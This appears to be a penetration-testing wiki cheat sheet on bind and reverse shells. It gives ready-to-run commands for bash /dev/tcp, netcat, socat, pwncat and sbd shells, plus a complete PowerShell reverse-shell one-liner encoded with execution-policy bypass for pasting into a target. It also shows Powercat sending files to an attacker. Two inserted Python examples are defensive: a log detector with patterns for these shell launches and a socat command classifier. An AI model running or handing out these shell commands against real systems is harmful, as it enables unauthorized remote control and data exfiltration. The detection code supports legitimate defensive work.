Direct and reverse shells

Penetration Testing Wiki

Once we are able to execute code remotely, whether through a known vulnerability, a SQL injection, or an RFI (Remote File Inclusion), it is extremely important to continue into the post-exploitation phase and spawn a proper shell.

Direct (bind) shells are used when the compromised machine is directly reachable from the Internet and the firewall allows incoming traffic (ingress filtering) to that specific port.

We use reverse shells in most cases, because the compromised machine usually sits inside a LAN or behind several layers of security. One of the perks of reverse shells is that firewalls usually do not limit outgoing traffic (egress filtering).

Classic methods to spawn remote shells


How to trigger a bash reverse shell:

On attacker:

nc -nvv -lp 8080

On target:

bash -i >& /dev/tcp/$IP/8080 0>&1


How to trigger a netcat bindshell:

On target:

nc -nvvlp 8989 -e /bin/bash

On attacker:

nc -nvv $IP 8989

How to trigger a netcat reverse shell:

On attacker:

nc -nvvlp 8989 $IP

On target:

nc -nvv $IP 8989 -e /bin/bash

To improve the interactive shell (Method 1):

stty raw -echo

To improve the interactive shell (Method 2):

python -c 'import pty; pty.spawn("/bin/bash")'
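The launch patterns listed above (bash with /dev/tcp, netcat with -e, a python pty upgrade) are also exactly what a defender should look for in process-execution telemetry. The following Python example is added here and is not part of the wiki; the log format it parses and the sample lines are constructed for the example (an auditd or EDR export would need its own parser), and the rules cover only the patterns shown on this page.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of process-execution telemetry (not real logs). Format assumed:
#   <timestamp> uid=<uid> exe=<path> cmd=<full command line>
SAMPLE_LOG = """\
2024-01-01T10:00:01Z uid=1000 exe=/usr/bin/bash cmd=bash -c "ls -la /var/www"
2024-01-01T10:00:02Z uid=33 exe=/usr/bin/bash cmd=bash -i >& /dev/tcp/198.51.100.7/8080 0>&1
2024-01-01T10:00:03Z uid=33 exe=/usr/bin/nc cmd=nc -nvvlp 8989 -e /bin/bash
2024-01-01T10:00:04Z uid=33 exe=/usr/bin/python3 cmd=python -c 'import pty; pty.spawn("/bin/bash")'
2024-01-01T10:00:05Z uid=33 exe=/usr/bin/socat cmd=socat TCP4:198.51.100.7:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
2024-01-01T10:00:06Z uid=1000 exe=/usr/bin/nc cmd=nc -zv 10.0.0.5 443
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) uid=(?P<uid>\d+) exe=(?P<exe>\S+) cmd=(?P<cmd>.*)$")

# Ordered rules; the first match wins. Each covers one launch pattern from the cheat sheet.
RULES = [
    ("bash-dev-tcp", re.compile(r"/dev/(?:tcp|udp)/")),                # bash -i >& /dev/tcp/...
    ("netcat-exec", re.compile(r"\bn(?:c|cat)\b.*\s-e\s+\S*sh\b")),    # nc ... -e /bin/bash
    ("socat-exec", re.compile(r"\bsocat\b.*\bEXEC:\S*sh\b", re.I)),    # socat ... EXEC:bash,...
    ("pty-spawn", re.compile(r"pty\.spawn\(")),                        # python -c 'import pty; ...'
]


def shell_direction(rule: str, cmd: str) -> str:
    """Classify whether the process listens (bind shell) or dials out (reverse shell)."""
    if rule == "pty-spawn":
        return "tty-upgrade"          # local step that follows an already established shell
    if rule == "netcat-exec" and re.search(r"\s-[a-zA-Z]*l", cmd):
        return "bind"                 # -l, possibly bundled with other flags as in -nvvlp
    if rule == "socat-exec" and re.search(r"-(?:l|listen)\b", cmd, re.I):
        return "bind"                 # TCP-LISTEN: or tcp-l:
    return "reverse"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one telemetry line, or None if it does not match the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect_shell_launches(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per log line whose command line matches a shell-launch rule."""
    findings: List[Dict[str, str]] = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        for name, pattern in RULES:
            if pattern.search(rec["cmd"]):
                findings.append({**rec, "rule": name,
                                 "direction": shell_direction(name, rec["cmd"])})
                break
    return findings


if __name__ == "__main__":
    for f in detect_shell_launches(SAMPLE_LOG):
        print(f"{f['ts']} uid={f['uid']} {f['rule']:<12} {f['direction']:<11} {f['cmd']}")
```

The benign lines (a directory listing and a plain port probe) produce no finding; the four matching lines come back with the rule name and whether the process listened or connected out, which is the first thing an analyst wants to know when deciding whether egress or ingress controls failed.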



Socat

Syntax:

socat [options] address1 address2

Examples of address:

  • stdio
  • tcp4:localhost:1080
  • tcp4-listen:8080 = tcp-l:8080
  • udp4:host:2049
  • udp4-l:500
  • exec:/bin/ls,pty
  • socks:socks.local:$IP:80
  • proxy:proxy.local:$IP:443
  • ssl-l:443,cert=./server.pem
  • open:file.txt
  • create:newfile.txt
  • UDP4-DATAGRAM:,bind=:9999,range=
  • TUN:,iff-up=1
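The address syntax above is regular enough to parse mechanically: a type, optional colon-separated parameters, then comma-separated options. The following Python example is added here and is not code from the wiki or from the socat project; it parses single addresses and then labels a whole socat command line (bind shell, reverse shell, tunnel, client) from the roles of its two addresses. It goes beyond the addresses listed above by handling the full set of tcp/udp/ssl/socks/proxy types; the role table and the labels are this example's own assumptions, and option values that themselves contain commas are not handled.

```python
import re
import shlex
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class SocatAddress:
    kind: str                          # address type, lower-cased ("tcp4-listen", "exec", ...)
    params: List[str]                  # colon-separated positional parts ("localhost", "1080")
    options: Dict[str, Optional[str]]  # comma-separated options; None for bare flags like "pty"


def parse_address(spec: str) -> SocatAddress:
    """Split one socat address into type, positional parameters and options."""
    body, *raw_opts = spec.split(",")          # caveat: commas inside option values break this
    if ":" in body:
        kind, rest = body.split(":", 1)
    else:
        kind, rest = body, ""
    params = rest.split(":") if rest else []
    options: Dict[str, Optional[str]] = {}
    for opt in raw_opts:
        if "=" in opt:
            key, value = opt.split("=", 1)
            options[key] = value
        else:
            options[opt] = None
    return SocatAddress(kind.lower(), params, options)


# Role table assumed for this example: how data enters or leaves the socat process.
CONNECT_TYPES = {"tcp", "tcp4", "tcp6", "udp", "udp4", "udp6",
                 "socks", "socks4", "socks4a", "proxy", "ssl", "openssl"}
LOCAL_TYPES = {"stdio", "file", "open", "create", "pty"}


def role(addr: SocatAddress) -> str:
    k = addr.kind
    if k in ("exec", "system"):
        return "exec"
    if k in LOCAL_TYPES:
        return "local"
    if k.startswith("tun"):
        return "tun"
    if k.endswith("-datagram"):
        return "datagram"
    if re.search(r"-(?:listen|l)$", k):        # tcp4-listen, tcp-l, udp4-l, ssl-l
        return "listen"
    if k in CONNECT_TYPES:
        return "connect"
    return "other"


def classify_command(cmdline: str) -> str:
    """Label a full socat command line by the roles of its two addresses."""
    toks = shlex.split(cmdline)
    # Skip the program name and any leading socat switches (-d, -v, ...).
    addrs = [parse_address(t) for t in toks[1:] if not t.startswith("-")]
    roles = {role(a) for a in addrs}
    if "exec" in roles and "listen" in roles:
        return "bind shell"
    if "exec" in roles and "connect" in roles:
        return "reverse shell"
    if "tun" in roles:
        return "tunnel"
    if "local" in roles and "connect" in roles:
        return "client"
    if "local" in roles and "listen" in roles:
        return "listener"
    if "listen" in roles and "connect" in roles:
        return "relay"
    return "other"


if __name__ == "__main__":
    for cmd in ("socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane",
                "socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane",
                "socat tcp-l:50500 TUN:,iff-up=1"):
        print(f"{classify_command(cmd):<14} {cmd}")
```

Run over captured command lines, the classifier separates a socat that merely relays or tunnels from one that hands a shell to the network, which is the distinction that matters when socat is a legitimately installed tool on the host.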

How to trigger a bindshell with Socat:

On target:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

On attacker:

socat FILE:`tty`,raw,echo=0 TCP:$IP:1337

How to trigger a reverse shell with Socat:

On attacker:

socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0

On target:

socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane


Pwncat

Listen:

pwncat -l 4444

Bind shell:

pwncat -l -e '/bin/bash' 8080 -k

Reverse shell:

pwncat -e '/bin/bash' 4444 --reconn --recon-wait 1

Direct shell with mosh

Mosh provides resilient sessions over poor links or to servers with intermittent connectivity.

mosh --ssh="ssh -p 2222" $IP

How to trigger a direct or reverse shell with Msfvenom:

Learn how to spawn remote shells with Metasploit Msfvenom in Msfvenom Payloads Cheat Sheet.

How to trigger a direct or reverse shell with sbd:


Usage:

connect (tcp): sbd [-options] host port
listen (tcp):  sbd -l -p port [-options]

Spawn a bindshell on port 4444 on target:

sbd -l -p 4444 -e bash -v -n

Connect to the bindshell from the attacker:

sbd $IP 4444

Build a VPN with socat:

On server:

socat tcp-l:50500 TUN:,iff-up=1

On client:

socat tcp:$IP:50500 TUN:,iff-up=1

Windows Powershell Direct shell

$str='$client=New-Object System.Net.Sockets.TCPClient("'+$LHOST+'",'+$LPORT+');$stream= $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data =(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String );$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
# -encodedcommand expects the script as UTF-16LE text, base64-encoded
$b=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($str))
echo "powershell -ep bypass -nop -encodedcommand $b" | clip

Then directly paste (Ctrl+V) in the target terminal.

USB man-in-the-middle

  • proxy USB over IP

On the host with the USB device (serve the serial port over TCP):

socat /dev/ttyUSB0,raw,echo=0 tcp-listen:1337,reuseaddr

On the remote host (expose it as a virtual serial device):

socat PTY,raw,echo=0,link=/dev/ttyVUSB0 tcp:$TARGET:1337


Tiny SHell is an open-source UNIX backdoor (C language)

Powershell modules


Powercat offers netcat functionality in PowerShell; no extra packages are required. Good for data exfiltration.

On target (connect to the attacker and send input.txt):

powershell -exec bypass
Import-Module .\powercat.ps1
powercat -c $IP -p 80 -i input.txt

On attacker:

nc -vvlp 80 > input.txt




Webshells

python generate AbC /var/www/html/AbC.txt

Learn how to create webshells with Metasploit Msfvenom in Msfvenom payloads Cheat Sheet.